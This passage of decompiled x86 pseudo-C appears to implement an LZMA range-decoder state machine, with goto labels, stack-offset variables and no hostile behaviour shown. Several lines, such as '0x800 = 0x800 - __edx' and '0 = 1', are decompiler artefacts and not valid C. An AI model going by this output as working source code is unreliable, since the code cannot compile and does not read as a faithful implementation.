                                                                                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      													__eax =  *(__ebp - 4);
                                                                                                                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      													 *(__ebp - 0x34) = 1;
                                                                                                                                                                                      													 *(__ebp - 0x84) = 7;
                                                                                                                                                                                      													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      													L132:
                                                                                                                                                                                      													 *(_t621 - 0x54) = _t614;
                                                                                                                                                                                      													goto L133;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                                      												__esi =  *(__ebp - 0x60);
                                                                                                                                                                                      												__cl = 8;
                                                                                                                                                                                      												__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                                      												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                                      												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                                      												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                                      												__ecx =  *(__ebp - 4);
                                                                                                                                                                                      												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                                      												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                                      												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                      												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                      												if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                                      													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                                      													if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                                      														_t98 = __ebp - 0x38;
                                                                                                                                                                                      														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                                      														__eflags =  *_t98;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													 *(__ebp - 0x38) = 0;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                                      												if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                                      													__ebx = 0;
                                                                                                                                                                                      													__ebx = 1;
                                                                                                                                                                                      													goto L61;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                      													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                      													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                      														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                      														__eflags = __eax;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													__ecx =  *(__ebp - 8);
                                                                                                                                                                                      													__ebx = 0;
                                                                                                                                                                                      													__ebx = 1;
                                                                                                                                                                                      													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                      													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                      													goto L41;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											case 7:
                                                                                                                                                                                      												goto L0;
                                                                                                                                                                                      											case 8:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      													__eax =  *(__ebp - 4);
                                                                                                                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      													 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                                      													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													__eax =  *(__ebp - 0x38);
                                                                                                                                                                                      													__ecx =  *(__ebp - 4);
                                                                                                                                                                                      													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                                      													 *(__ebp - 0x84) = 9;
                                                                                                                                                                                      													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                                      													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												while(1) {
                                                                                                                                                                                      													L132:
                                                                                                                                                                                      													 *(_t621 - 0x54) = _t614;
                                                                                                                                                                                      													goto L133;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											case 9:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      													goto L89;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x60);
                                                                                                                                                                                      												if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                                      													goto L171;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eax = 0;
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                      												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                                      												__eflags = _t258;
                                                                                                                                                                                      												0 | _t258 = _t258 + _t258 + 9;
                                                                                                                                                                                      												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                                                                                      												goto L75;
                                                                                                                                                                                      											case 0xa:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      													__eax =  *(__ebp - 4);
                                                                                                                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      													 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                                      													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      													while(1) {
                                                                                                                                                                                      														L132:
                                                                                                                                                                                      														 *(_t621 - 0x54) = _t614;
                                                                                                                                                                                      														goto L133;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eax =  *(__ebp - 0x28);
                                                                                                                                                                                      												goto L88;
                                                                                                                                                                                      											case 0xb:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      													__ecx =  *(__ebp - 0x24);
                                                                                                                                                                                      													__eax =  *(__ebp - 0x20);
                                                                                                                                                                                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													__eax =  *(__ebp - 0x24);
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x28);
                                                                                                                                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                      												L88:
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                                      												 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                      												L89:
                                                                                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                                                                                      												 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                                      												__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                      												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                      												goto L68;
                                                                                                                                                                                      											case 0xc:
                                                                                                                                                                                      												L99:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      													 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												_t334 = __ebp - 0x70;
                                                                                                                                                                                      												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      												__eflags =  *_t334;
                                                                                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                      												goto L101;
                                                                                                                                                                                      											case 0xd:
                                                                                                                                                                                      												L37:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      													 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												_t122 = __ebp - 0x70;
                                                                                                                                                                                      												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      												__eflags =  *_t122;
                                                                                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												L39:
                                                                                                                                                                                      												__eax =  *(__ebp - 0x40);
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                      												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                                      													goto L48;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eflags = __ebx - 0x100;
                                                                                                                                                                                      												if(__ebx >= 0x100) {
                                                                                                                                                                                      													goto L54;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												L41:
                                                                                                                                                                                      												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                                      												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                                      												 *(__ebp - 0x48) = __eax;
                                                                                                                                                                                      												__eax = __eax + 1;
                                                                                                                                                                                      												__eax = __eax << 8;
                                                                                                                                                                                      												__eax = __eax + __ebx;
                                                                                                                                                                                      												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      												__ax =  *__esi;
                                                                                                                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      												__edx = __ax & 0x0000ffff;
                                                                                                                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      													__cx = __ax;
                                                                                                                                                                                      													 *(__ebp - 0x40) = 1;
                                                                                                                                                                                      													__cx = __ax >> 5;
                                                                                                                                                                                      													__eflags = __eax;
                                                                                                                                                                                      													__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                      													 *__esi = __ax;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      													0x800 = 0x800 - __edx;
                                                                                                                                                                                      													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                      													__ebx = __ebx + __ebx;
                                                                                                                                                                                      													 *__esi = __cx;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      													goto L39;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													goto L37;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											case 0xe:
                                                                                                                                                                                      												L46:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      													 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												_t156 = __ebp - 0x70;
                                                                                                                                                                                      												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      												__eflags =  *_t156;
                                                                                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												while(1) {
                                                                                                                                                                                      													L48:
                                                                                                                                                                                      													__eflags = __ebx - 0x100;
                                                                                                                                                                                      													if(__ebx >= 0x100) {
                                                                                                                                                                                      														break;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      													__edx = __ebx + __ebx;
                                                                                                                                                                                      													__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                      													__esi = __edx + __eax;
                                                                                                                                                                                      													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      													__ax =  *__esi;
                                                                                                                                                                                      													 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      													__edi = __ax & 0x0000ffff;
                                                                                                                                                                                      													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                      													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      													if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      														__cx = __ax;
                                                                                                                                                                                      														_t170 = __edx + 1; // 0x1
                                                                                                                                                                                      														__ebx = _t170;
                                                                                                                                                                                      														__cx = __ax >> 5;
                                                                                                                                                                                      														__eflags = __eax;
                                                                                                                                                                                      														 *__esi = __ax;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      														0x800 = 0x800 - __edi;
                                                                                                                                                                                      														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                      														__ebx = __ebx + __ebx;
                                                                                                                                                                                      														 *__esi = __cx;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      														continue;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														goto L46;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												L54:
                                                                                                                                                                                      												_t173 = __ebp - 0x34;
                                                                                                                                                                                      												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                      												__eflags =  *_t173;
                                                                                                                                                                                      												goto L55;
                                                                                                                                                                                      											case 0xf:
                                                                                                                                                                                      												L58:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      													 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												_t203 = __ebp - 0x70;
                                                                                                                                                                                      												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      												__eflags =  *_t203;
                                                                                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												L60:
                                                                                                                                                                                      												__eflags = __ebx - 0x100;
                                                                                                                                                                                      												if(__ebx >= 0x100) {
                                                                                                                                                                                      													L55:
                                                                                                                                                                                      													__al =  *(__ebp - 0x44);
                                                                                                                                                                                      													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                      													goto L56;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												L61:
                                                                                                                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      												__edx = __ebx + __ebx;
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                      												__esi = __edx + __eax;
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      												__ax =  *__esi;
                                                                                                                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                                                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      													__cx = __ax;
                                                                                                                                                                                      													_t217 = __edx + 1; // 0x1
                                                                                                                                                                                      													__ebx = _t217;
                                                                                                                                                                                      													__cx = __ax >> 5;
                                                                                                                                                                                      													__eflags = __eax;
                                                                                                                                                                                      													 *__esi = __ax;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      													0x800 = 0x800 - __edi;
                                                                                                                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                      													__ebx = __ebx + __ebx;
                                                                                                                                                                                      													 *__esi = __cx;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      													goto L60;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													goto L58;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											case 0x10:
                                                                                                                                                                                      												L109:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      													 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												_t365 = __ebp - 0x70;
                                                                                                                                                                                      												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      												__eflags =  *_t365;
                                                                                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												goto L111;
                                                                                                                                                                                      											case 0x11:
                                                                                                                                                                                      												L68:
                                                                                                                                                                                      												_t614 =  *(_t621 - 0x58);
                                                                                                                                                                                      												 *(_t621 - 0x84) = 0x12;
                                                                                                                                                                                      												while(1) {
                                                                                                                                                                                      													L132:
                                                                                                                                                                                      													 *(_t621 - 0x54) = _t614;
                                                                                                                                                                                      													goto L133;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											case 0x12:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      													 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                                      													__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                                      													while(1) {
                                                                                                                                                                                      														L132:
                                                                                                                                                                                      														 *(_t621 - 0x54) = _t614;
                                                                                                                                                                                      														goto L133;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                                                      												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                      												goto L130;
                                                                                                                                                                                      											case 0x13:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      													_t469 = __ebp - 0x58;
                                                                                                                                                                                      													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                      													__eflags =  *_t469;
                                                                                                                                                                                      													 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                      													 *(__ebp - 0x40) = 8;
                                                                                                                                                                                      													L144:
                                                                                                                                                                                      													 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                                      													goto L145;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                      												 *(__ebp - 0x30) = 8;
                                                                                                                                                                                      												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                                      												L130:
                                                                                                                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      												 *(__ebp - 0x40) = 3;
                                                                                                                                                                                      												goto L144;
                                                                                                                                                                                      											case 0x14:
                                                                                                                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                                      												__eax =  *(__ebp - 0x80);
                                                                                                                                                                                      												 *(_t621 - 0x88) = _t542;
                                                                                                                                                                                      												goto L1;
                                                                                                                                                                                      											case 0x15:
                                                                                                                                                                                      												__eax = 0;
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                      												__al = __al & 0x000000fd;
                                                                                                                                                                                      												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                      												goto L120;
                                                                                                                                                                                      											case 0x16:
                                                                                                                                                                                      												__eax =  *(__ebp - 0x30);
                                                                                                                                                                                      												__eflags = __eax - 4;
                                                                                                                                                                                      												if(__eax >= 4) {
                                                                                                                                                                                      													_push(3);
                                                                                                                                                                                      													_pop(__eax);
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 4);
                                                                                                                                                                                      												 *(__ebp - 0x40) = 6;
                                                                                                                                                                                      												__eax = __eax << 7;
                                                                                                                                                                                      												 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      												goto L145;
                                                                                                                                                                                      											case 0x17:
                                                                                                                                                                                      												L145:
                                                                                                                                                                                      												__eax =  *(__ebp - 0x40);
                                                                                                                                                                                      												 *(__ebp - 0x50) = 1;
                                                                                                                                                                                      												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                                      												goto L149;
                                                                                                                                                                                      											case 0x18:
                                                                                                                                                                                      												L146:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      													 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												_t484 = __ebp - 0x70;
                                                                                                                                                                                      												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      												__eflags =  *_t484;
                                                                                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												L148:
                                                                                                                                                                                      												_t487 = __ebp - 0x48;
                                                                                                                                                                                      												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                      												__eflags =  *_t487;
                                                                                                                                                                                      												L149:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                      												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                      													__ecx =  *(__ebp - 0x40);
                                                                                                                                                                                      													__ebx =  *(__ebp - 0x50);
                                                                                                                                                                                      													0 = 1;
                                                                                                                                                                                      													__eax = 1 << __cl;
                                                                                                                                                                                      													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                                      													__eax =  *(__ebp - 0x7c);
                                                                                                                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      													while(1) {
                                                                                                                                                                                      														 *(_t621 - 0x88) = _t542;
                                                                                                                                                                                      														goto L1;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eax =  *(__ebp - 0x50);
